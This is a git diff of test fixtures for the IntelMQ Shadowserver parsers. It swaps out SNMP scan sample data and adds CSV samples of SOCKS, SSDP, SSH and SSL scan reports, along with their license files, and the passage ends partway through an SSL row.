-"2016-07-24 04:14:40","198.51.100.190","udp",161,,"Linux R6100 2.6.31 #1 Mon May 19 22:17:10 CST 2014 mips MIB=01a01","Unknow",8767,"DE","BAYERN","HERZOGENAURACH",2,0,0,
-"2016-07-24 04:14:40","198.51.100.187","udp",161,,"4 Port VDSL IAD","nobrand",6805,"DE","RHEINLAND-PFALZ","MAINZ",2,0,0,
-"2016-07-24 04:14:41","198.51.100.63","udp",161,,"Thomson CableHome PacketCable Gateway E-MTA <<HW_REV: 2.0.; VENDOR: Thomson; BOOTR: 2.1.7i; SW_REV: ST9B.01.22; MODEL: TWG850-4>>","198-51-100-63.example.net",35244,"DE","BAYERN","LEINACH",2,0,0,
-"2016-07-24 04:14:41","198.51.100.228","udp",161,,"Linux easy.box 198.51.100.180 #2 Thu Sep 11 12:19:36 CST 2014 mips",,3209,"DE","BAYERN","BAYREUTH",2,0,0,
-"2016-07-24 04:14:41","198.51.100.5","udp",161,"198-51-100-5.example.net",,"idrac-GZ8K022",24940,"DE","BAYERN","GUNZENHAUSEN",2,0,0,
-"2016-07-24 04:14:41","198.51.100.207","udp",161,"198-51-100-207.example.net","4 Port VDSL IAD",,6805,"DE","BAYERN","MUNICH",2,0,0,
-"2016-07-24 04:14:41","198.51.100.226","udp",161,"198-51-100-226.example.net",,"mysql1-idrac",24940,"DE","BAYERN","GUNZENHAUSEN",2,0,0,
-"2016-07-24 04:14:41","198.51.100.253","udp",161,,"Cisco IOS Software ASR1000 Software (X86_64_LINUX_IOSD-UNIVERSALK9-M) Version 15.4(3)S2 RELEASE SOFTWARE (fc3)Technical Support: http://www.cisco.com/techsupportCopyright (c) 1986-2015 by Cisco Systems Inc.Compiled Fri 30-Jan-15 14:23 by mcpre","198-51-100-253.example.net",8881,"DE","BAYERN","WURZBURG",2,0,0,
-"2016-07-24 04:14:41","198.51.100.206","udp",161,,"Linux (none) 2.4.19-uc1 #12 Fri Feb 20 07:24:41 KGT 2004 armv5l",,3320,"DE","NORDRHEIN-WESTFALEN","ERWITTE",2,541690,874899,
-"2016-07-24 04:14:42","198.51.100.73","udp",161,"198-51-100-73.example.net","Wireless ADSL Router","Gigaset SE555",8881,"DE","NORDRHEIN-WESTFALEN","SCHWERTE",2,0,0,
-"2016-07-24 04:14:42","198.51.100.174","udp",161,,,,29252,"DE","BADEN-WURTTEMBERG","ELLWANGEN",2,0,0,
-"2016-07-24 04:14:42","198.51.100.182","udp",161,"198-51-100-182.example.net","P-2602H-D7A",,6805,"DE","RHEINLAND-PFALZ","LAHNSTEIN",2,0,0,
-"2016-07-24 04:14:42","198.51.100.211","udp",161,,,,6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:42","198.51.100.118","udp",58264,"198-51-100-118.example.net","SonicWALL NSA 220 (SonicOS Enhanced 198.51.100.249-48o)",,3320,"DE","SACHSEN","LEIPZIG",2,541690,874899,
-"2016-07-24 04:14:42","198.51.100.62","udp",161,,"Juniper SRX220H2",,3320,"DE","NIEDERSACHSEN","SEHNDE",2,518210,737415,
-"2016-07-24 04:14:43","198.51.100.127","udp",161,"198-51-100-127.example.net",,,6805,"DE","BERLIN","BERLIN",2,518210,737415,
-"2016-07-24 04:14:43","198.51.100.92","udp",161,"198-51-100-92.example.net",,,16202,"DE","BADEN-WURTTEMBERG","SINSHEIM",2,0,0,
-"2016-07-24 04:14:43","198.51.100.218","udp",161,,,,6805,"DE","BADEN-WURTTEMBERG","SCHORNDORF",2,0,0,
-"2016-07-24 04:14:44","198.51.100.155","udp",161,,,,6805,"DE","BAYERN","MUNICH",2,518210,737415,
-"2016-07-24 04:14:44","198.51.100.185","udp",161,"198-51-100-185.example.net","4 Port VDSL IAD","nobrand",6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:44","198.51.100.1","udp",161,,,,3320,"DE","NORDRHEIN-WESTFALEN","MONCHENGLADBACH",2,0,0,
-"2016-07-24 04:14:44","198.51.100.51","udp",161,"198-51-100-51.example.net","Prestige 660HW-T7C","P660HW-T7C",3209,"DE","BADEN-WURTTEMBERG","ESSLINGEN AM NECKAR",2,0,0,
-"2016-07-24 04:14:44","198.51.100.164","udp",161,,"Inline IEC 61131-3 controller with gsm/ gprs modem","ILC 151 GSM_GPRS",3320,"DE","NORDRHEIN-WESTFALEN","BONN",2,0,0,
-"2016-07-24 04:14:45","198.51.100.16","udp",161,,,,6805,"DE","BAYERN","MUNICH",2,518210,737415,
-"2016-07-24 04:14:45","198.51.100.171","udp",161,"198-51-100-171.example.net",,,6805,"DE","HESSEN","FRANKFURT AM MAIN",2,518210,737415,
-"2016-07-24 04:14:45","198.51.100.89","udp",161,,"4 Port VDSL IAD",,6805,"DE","BERLIN","BERLIN",2,0,0,
-"2016-07-24 04:14:45","198.51.100.65","udp",161,,,,6805,"DE","NORDRHEIN-WESTFALEN","PADERBORN",2,518210,737415,
-"2016-07-24 04:14:45","198.51.100.248","udp",161,,"4 Port ADSL IAD","nobrand",6805,"DE","BAYERN","MUNICH",2,0,0,
-"2016-07-24 04:14:45","198.51.100.17","udp",161,,,,8881,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:45","198.51.100.134","udp",161,,"drg700 drg700 Version: drgos-drg700-1.13.2-RC1",,47297,"DE","BAYERN","LINDAU",2,0,0,
-"2016-07-24 04:14:45","198.51.100.21","udp",161,"198-51-100-21.example.net","4 Port VDSL IAD","nobrand",6805,"DE","BAYERN","MUNICH",2,0,0,
-"2016-07-24 04:14:46","198.51.100.203","udp",161,"198-51-100-203.example.net",,,3320,"DE","HESSEN","HOFHEIM AM TAUNUS",2,541690,874899,
-"2016-07-24 04:14:46","198.51.100.216","udp",161,"198-51-100-216.example.net",,,20640,"DE","HESSEN","HOFHEIM AM TAUNUS",2,0,0,
-"2016-07-24 04:14:47","198.51.100.229","udp",161,"198-51-100-229.example.net","R3002",,29562,"DE","BADEN-WURTTEMBERG","LUDWIGSBURG",2,0,0,
-"2016-07-24 04:14:47","198.51.100.54","udp",161,,,,6805,"DE","NORDRHEIN-WESTFALEN","DUSSELDORF",2,0,0,
-"2016-07-24 04:14:47","198.51.100.225","udp",161,"198-51-100-225.example.net","Linux R6100 2.6.31 #1 Wed Jul 3 05:22:01 CST 2013 mips MIB=01a01",,6830,"DE","NORDRHEIN-WESTFALEN","WERNE",2,0,0,
-"2016-07-24 04:14:47","198.51.100.38","udp",161,,,,6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:47","198.51.100.22","udp",161,,"drg700 drg700 Version: drgos-drg700-1.13.2-RC1",,47297,"DE","BADEN-WURTTEMBERG","WANGEN IM ALLGAU",2,0,0,
-"2016-07-24 04:14:47","198.51.100.106","udp",161,,,,6805,"DE","BADEN-WURTTEMBERG","MANNHEIM",2,0,0,
-"2016-07-24 04:14:47","198.51.100.130","udp",161,," HUAWEI Eudemon8080E Huawei Versatile Routing Platform SoftwareSoftware Version:VRP (R) Software Version 5.70 (Eudemon8080E V200R001C01SPC800)Copyright (C) 2007-2013 Huawei Technologies Co. Ltd. All rights reserved.","DUS_CSIC-DMZ-E8000E(1-2-14)",3209,"DE","NORDRHEIN-WESTFALEN","DUSSELDORF",2,0,0,
-"2016-07-24 04:14:48","198.51.100.37","udp",161,"198-51-100-37.example.net",,,6805,"DE","NORDRHEIN-WESTFALEN","GUTERSLOH",2,518210,737415,
-"2016-07-24 04:14:48","198.51.100.148","udp",161,,,,6805,"DE","HAMBURG","HAMBURG",2,0,0,
-"2016-07-24 04:14:48","198.51.100.220","udp",161,,,,20694,"DE","HAMBURG","HAMBURG",2,0,0,
+"timestamp","ip","protocol","port","hostname","sysdesc","sysname","asn","geo","region","city","version","naics","sic","sector","device_vendor","device_type","device_model","device_version","device_sector","tag","community"
+"2010-02-10 00:00:00",192.168.0.1,udp,161,node01.example.com,,,64512,ZZ,Region,City,2,0,0,"Communications, Service Provider, and Hosting Service",,,,,,snmp,public
+"2010-02-10 00:00:01",192.168.0.2,udp,161,node02.example.com,"RouterOS RB4011iGS+",,64512,ZZ,Region,City,2,0,0,,MikroTik,router,,,consumer,snmp,public
+"2010-02-10 00:00:02",192.168.0.3,udp,161,node03.example.com,"Kaonmedia cablemodem reference design <<HW_REV: v1.0; VENDOR: Kaonmedia; BOOTR: 2.4.0mp1; SW_REV: 3.0.8; MODEL: CG2001-UN2NA>",,64512,ZZ,Region,City,2,0,0,,KAONMEDIA,router,CG2001-UN2NA,,consumer,snmp,public
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_snmp.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_snmp.csv.license
index 942a94035..f512a890e 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_snmp.csv.license
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_snmp.csv.license
@@ -1,2 +1,2 @@
-SPDX-FileCopyrightText: 2019 Guillermo Rodriguez
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
 SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_socks.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_socks.csv
new file mode 100644
index 000000000..c591a5c09
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_socks.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","sector"
+"2010-02-10 00:00:00",192.168.0.1,tcp,1080,node01.example.com,socks4,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service"
+"2010-02-10 00:00:01",192.168.0.2,tcp,1080,node02.example.com,socks5,64512,ZZ,Region,City,0,0,"Communications, Service Provider, and Hosting Service"
+"2010-02-10 00:00:02",192.168.0.3,tcp,1080,node03.example.com,socks4,64512,ZZ,Region,City,0,0,"Retail Trade"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_socks.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_socks.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_socks.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssdp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssdp.csv
index 71d1108d4..317e4e533 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssdp.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssdp.csv
@@ -1,3 +1,2 @@
-"timestamp","ip","protocol","port","hostname","tag","header","asn","geo","region","city","systime","cache_control","location","server","search_target","unique_service_name","host","nts","nt","naics","sic","sector"
-"2019-09-04 07:13:42","198.123.245.171","udp",32822,,"ssdp","HTTP/1.1 200 OK",5678,"AA","LOCATION","LOCATION","Fri, 16 Jan 1970 00:05:23 GMT","max-age=1800","http://198.123.245.1:52869/gatedesc.xml","Linux, UPnP/1.0, Portable SDK for UPnP devices/1.6.6","upnp:rootdevice","uuid:20809696-105a-3721-e8b8-2c957f6259fe::upnp:rootdevice",,,,517311,0,
-"2019-09-04 07:13:50","198.123.245.237","udp",32818,"localhost.localdomain","ssdp","HTTP/1.1 200 OK",5678,"AA","LOCATION","LOCATION","Thu, 20 Jan 2000 12:14:46 GMT","max-age=1800","http://198.123.245.1:52869/gatedesc.xml","Linux/2.6.20-Amazon_SE, UPnP/1.0, Intel SDK for UPnP devices /1.2","upnp:rootdevice","uuid:160a0200-ac91-4b05-8adf-f5ccc5a5ebaa::upnp:rootdevice",,,,517311,0,
+"timestamp","ip","protocol","port","hostname","tag","header","asn","geo","region","city","systime","cache_control","location","server","search_target","unique_service_name","host","nts","nt","content_type","naics","sic","sector","server_port","instance","version","updated_at","resource_identifier"
+"2022-02-07 06:11:01","98.53.0.0","udp",32414,,"plex","HTTP/1.0 200 OK",12345,"US","COLORADO","LITTLETON",,,,"c6ca79537ead4f14aa1456890f9d5c71.plex.direct",,,,,,"plex/media-server",517311,,"Communications, Service Provider, and Hosting Service",32400,"DESKTOP-DJ4NNGP","1.19.3.2764-ef515a800",1644185489,"e9d68a3332542938345388a40001be08f8907b32"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssh.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssh.csv
new file mode 100644
index 000000000..837adbad1
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssh.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","serverid_raw","serverid_version","serverid_software","serverid_comment","server_cookie","available_kex","available_ciphers","available_mac","available_compression","selected_kex","algorithm","selected_cipher","selected_mac","selected_compression","server_signature_value","server_signature_raw","server_host_key","server_host_key_sha256","rsa_prime","rsa_prime_length","rsa_generator","rsa_generator_length","rsa_public_key","rsa_public_key_length","rsa_exponent","rsa_modulus","rsa_length","dss_prime","dss_prime_length","dss_generator","dss_generator_length","dss_public_key","dss_public_key_length","dss_dsa_public_g","dss_dsa_public_p","dss_dsa_public_q","dss_dsa_public_y","ecdsa_curve25519","ecdsa_curve","ecdsa_public_key_length","ecdsa_public_key_b","ecdsa_public_key_gx","ecdsa_public_key_gy","ecdsa_public_key_n","ecdsa_public_key_p","ecdsa_public_key_x","ecdsa_public_key_y","ed25519_curve25519","ed25519_cert_public_key_nonce","ed25519_cert_public_key_bytes","ed25519_cert_public_key_raw","ed25519_cert_public_key_sha256","ed25519_cert_public_key_serial","ed25519_cert_public_key_type_id","ed25519_cert_public_key_type_name","ed25519_cert_public_key_keyid","ed25519_cert_public_key_principles","ed25519_cert_public_key_valid_after","ed25519_cert_public_key_valid_before","ed25519_cert_public_key_duration","ed25519_cert_public_key_sigkey_bytes","ed25519_cert_public_key_sigkey_raw","ed25519_cert_public_key_sigkey_sha256","ed25519_cert_public_key_sigkey_value","ed25519_cert_public_key_sig_raw","banner","userauth_methods","device_vendor","device_type","device_model","device_version","device_sector"
+"2022-01-10 02:20:37","18.179.0.0","tcp",22,"ec2-18-179-0-0.ap-northeast-1.compute.amazonaws.com","ssh",16509,"JP","TOKYO","TOKYO",454110,,"SSH-2.0-OpenSSH_7.4","2.0","OpenSSH_7.4",,"bGjsifbPIDWT7tAu8BMjyg==","curve25519-sha256, curve25519-sha256@libssh.org, ecdh-sha2-nistp256, ecdh-sha2-nistp384, ecdh-sha2-nistp521, diffie-hellman-group-exchange-sha256, diffie-hellman-group16-sha512, diffie-hellman-group18-sha512, diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha256, diffie-hellman-group14-sha1, diffie-hellman-group1-sha1","chacha20-poly1305@openssh.com, aes128-ctr, aes192-ctr, aes256-ctr, aes128-gcm@openssh.com, aes256-gcm@openssh.com, aes128-cbc, aes192-cbc, aes256-cbc, blowfish-cbc, cast128-cbc, 3des-cbc","umac-64-etm@openssh.com, umac-128-etm@openssh.com, hmac-sha2-256-etm@openssh.com, hmac-sha2-512-etm@openssh.com, hmac-sha1-etm@openssh.com, umac-64@openssh.com, umac-128@openssh.com, hmac-sha2-256, hmac-sha2-512, hmac-sha1","none, zlib@openssh.com","curve25519-sha256@libssh.org","ecdsa-sha2-nistp256","aes128-ctr","hmac-sha2-256","none","AAAAIQCd+X/B/OEx+FrwJSlVecOvNMuS5w2vTRz0z4prM+5VBwAAACEArU60b9CHs/d5BgyaOd7vmFygTMK5SyL90bS8VIztX/4=","AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAABKAAAAIQCd+X/B/OEx+FrwJSlVecOvNMuS5w2vTRz0z4prM+5VBwAAACEArU60b9CHs/d5BgyaOd7vmFygTMK5SyL90bS8VIztX/4=","AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDSEHaLacthwB30rtA4xJgN3G9zXkCmm2WhV/TlNBrD20fuNQAZX7XciX2YkqIHtK2dWLBYwVCCqvl//zoM42kI=","a6e4e1c16ba25d51bcddc58a6e16797144575dd18d02d9dedf75093d2b15c557",,,,,,,,,,,,,,,,,,,,"1xx7ASut7BF4ED8b592bebZBMBKTCzOsmbH4cjwx/0U=","P-256",256,"WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=","axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=","T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=","/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE=","/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=","NIQdotpy2HAHfSu0DjEmA3cb3NeQKabZaFX9OU0GsPY=","0fuNQAZX7XciX2YkqIHtK2dWLBYwVCCqvl//zoM42kI=",,,,,,,,,,,,,,,,,,,,"publickey",,,,,
+"2022-01-10 02:20:37","170.10.0.0","tcp",22,"170-10-0-0.example.com","ssh",11976,"US","TEXAS","MARSHALL",,,"SSH-2.0-ARRIS_0.50","2.0","ARRIS_0.50",,"Y4RQS9sdRgEFwNJKVP6bZg==","diffie-hellman-group1-sha1","aes128-cbc, 3des-cbc, aes256-cbc, twofish256-cbc, twofish-cbc, twofish128-cbc, blowfish-cbc","hmac-sha1-96, hmac-sha1, hmac-md5","none","diffie-hellman-group1-sha1","ssh-rsa","aes128-cbc","hmac-sha1","none","LQj+UTJEQqdb/p/c/19yVc63eo+rnedwXKjP6eNNxxijN2cFoOjVMeqT2QTBjyoN7yRWBU2EID+3y2jUYT8mCqmqfyUv1eEbiCfLVlUyQ0X/CY9I5DDb5l6yEjNkuH2xVNNV6R7GFRwyYKAsYzfy+i9o1OORlUh3tozkkPfA9z/NlA==","AAAAB3NzaC1yc2EAAACCLQj+UTJEQqdb/p/c/19yVc63eo+rnedwXKjP6eNNxxijN2cFoOjVMeqT2QTBjyoN7yRWBU2EID+3y2jUYT8mCqmqfyUv1eEbiCfLVlUyQ0X/CY9I5DDb5l6yEjNkuH2xVNNV6R7GFRwyYKAsYzfy+i9o1OORlUh3tozkkPfA9z/NlA==","AAAAB3NzaC1yc2EAAAADAQABAAAAgwCDq1kGqqwdQVryCNcoyDbBpnL/okvM2d9NmR0OjprcToCZ2TZ5WUZt2BGwPE1QLJYskjhv7GwlfQ4qhEqHDg35wMrkO7j9LTQC7KW3xisOLuUil4FmMxPkol6s39945zBGpjw0l/BmJnUDlutxavkdd84fppFMwXNp2vbjxV1SYVc9","d53fedbfe92e631264629882b2e85bfd213ca4b07b824cd31f8de1fcb8d0ddcb",,,,,,,65537,"g6tZBqqsHUFa8gjXKMg2waZy/6JLzNnfTZkdDo6a3E6Amdk2eVlGbdgRsDxNUCyWLJI4b+xsJX0OKoRKhw4N+cDK5Du4/S00Auylt8YrDi7lIpeBZjMT5KJerN/feOcwRqY8NJfwZiZ1A5brcWr5HXfOH6aRTMFzadr248VdUmFXPQ==",1040,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"publickey, password","Arris",,,,
+"2022-01-10 02:20:37","72.17.0.0","tcp",22,"072-017-0-0.example.com","ssh",33363,"US","FLORIDA","ORLANDO",517311,,"SSH-1.99-Cisco-1.25","1.99","Cisco-1.25",,"Z2fOfWsrLlh76Y0bOqa1cw==","diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha1, diffie-hellman-group1-sha1","aes128-cbc, 3des-cbc, aes192-cbc, aes256-cbc","hmac-sha1, hmac-sha1-96, hmac-md5, hmac-md5-96","none","diffie-hellman-group14-sha1","ssh-rsa","aes128-cbc","hmac-sha1","none","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","06ff3cce443ed832927576d982b69d5a526d0e63334c72e87201deda61679406",,,,,,,65537,"yFVwcChoYt+YGm8BzWYugcZbNQRrQ1VWRYcL4U6SSkyoVeE9h5wxRu/hQaWHo3PdsB9Nuln/riRyKZypFUEZ5zlffMyl1uvE8/jp8E/GgUHSyPkGAwu8C8BkX/nDolxAJKTK6djiZnvhsEPe6AXHBMHbto/b3GABUNPngjzX8D63GYcFW9NJLf5qC1UsVkXbAzM0IjQ2X9s3pfhUCAJeXAn2i0gEGtUyF8vEjNdwdG655aXciKrpEEtM1L/zy/+gLH4YC13kAYI7NVyH+qi/mXbULLOQClA7iYK1g3Et58jWUIPwgLfF3SLC57bt2wp/lRgNTv4FBi0tWvRqBnf5UQK5ZjgzbW3bO+Ju4cWgH/4M4NCxSceh4cLm5lQs01xB5feSh2ByqA7wrVDoFJu81LoMVo4bCz30+lH2QsLwmNtUhlWLKBD4k09g4bgBa4jPj0/Nya3rBR4GQ6LG6ltFQotm8wCkgbv76YWqk20nQ6NMYZFvSQm981JFtoHv3vxq48VeHDV0QvV0P12BCFprRf4B0otIvSsHl+LDeUxJAf+Nbw78gzncjyfCbWtCPbwaJQ8CeqnTBzj5TluaFvN8goG5lCTWJGfjIrwAZXOokv9NOqmIiMJJx3s22OX6GHfJAzje2ALLDsAiXBub4iCOdGdTfVbBpFL+bGTK9qfa8vE=",4096,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"publickey, keyboard-interactive, password","Cisco",,,,"enterprise"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssh.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssh.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssh.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl.csv
new file mode 100644
index 000000000..0b125001b
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","port","hostname","tag","handshake","asn","geo","region","city","cipher_suite","ssl_poodle","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","ssl_version","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","naics","sic","freak_vulnerable","freak_cipher_suite","sector","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","http_response_type","http_code","http_reason","content_type","http_connection","www_authenticate","set_cookie","server_type","content_length","transfer_encoding","http_date","cert_valid","self_signed","cert_expired","browser_trusted","validation_level","browser_error","tlsv13_support","tlsv13_cipher","jarm"
+"2022-01-10 00:01:42","96.60.0.0",10443,"96-60-0-0.example.com","ssl,vpn","TLSv1.2",4181,"US","WISCONSIN","MILWAUKEE","TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","N",1024,"FGT60D4614030700","support","2014-06-23 09:56:32","2038-01-19 03:14:07","5A:3D:FF:06:F9:E9:25:37:57:F9:09:52:33:A4:85:15:24:2D:88:7F","168CAE",2,"sha1WithRSAEncryption","rsaEncryption","Fortinet","FortiGate","US","California","Sunnyvale",,,,,"support@fortinet.com",,,"Fortinet","Certificate Authority","US","California","Sunnyvale",,,,,"support@fortinet.com",,,517311,,"N",,,"35:AB:B6:76:2A:3D:17:B2:FB:40:45:1B:FC:0A:99:0A:6E:48:57:F7:30:0A:3B:B1:1A:E6:99:70:5B:7C:32:41","88:7B:16:DB:39:44:0C:47:0E:4A:8F:0B:C5:FB:4D:45:BC:93:5A:00:43:A1:D9:7F:05:1D:86:33:02:F8:FC:57:67:A6:1D:C0:FF:F7:D2:40:D8:9A:21:AE:4E:6D:DC:E7:FF:72:BF:13:CB:EE:A7:5F:CD:83:EA:8A:5E:FB:87:DD","99:45:1F:2E:AE:EB:88:91:27:43:33:79:FA:93:7D:CA","HTTP/1.1",200,"OK","text/html",,,,"xxxxxxxx-xxxxx",131,,"Mon, 10 Jan 2022 00:01:44 GMT","Y","N","N","N","unknown","x509: unknown error",,,
+"2022-01-10 00:01:42","113.160.0.0",10443,"","ssl","TLSv1.2",45899,"VN","THAI BINH","THAI BINH","TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","N",2048,"1078-btb-tbi-HungHa-61d39c6d5a7e2","1078-btb-tbi-HungHa-61d39c6d5a7e2","2022-01-04 01:01:34","2023-02-06 01:01:34","A9:00:BB:E1:54:4D:56:54:59:F1:B7:EA:F1:1A:D5:36:5C:63:90:8E","36974C4C6B1B3785",2,"sha256WithRSAEncryption","rsaEncryption","pfSense webConfigurator Self-Signed Certificate",,,,,,,,,,,,"pfSense webConfigurator Self-Signed Certificate",,,,,,,,,,,,517311,,"N",,,"38:85:F0:44:1E:AD:84:B8:2F:43:68:BA:AC:EE:17:13:A4:BF:86:1D:48:75:7E:22:FA:08:4C:28:5F:AC:3E:5F","AE:1B:4F:D1:E4:C0:35:9D:2A:4F:7A:37:B8:7B:11:9D:84:25:23:21:AB:EF:B2:0F:DC:C9:F2:A3:72:28:92:E1:74:72:FA:E1:09:6C:E1:F6:B6:E3:A7:61:1C:58:89:34:D7:06:5C:3D:0A:A7:F6:CC:8A:D6:24:D0:04:4C:03:02","16:93:9A:F4:35:7F:9A:85:45:71:91:C7:7C:80:88:00","HTTP/1.1",200,"OK","text/html; 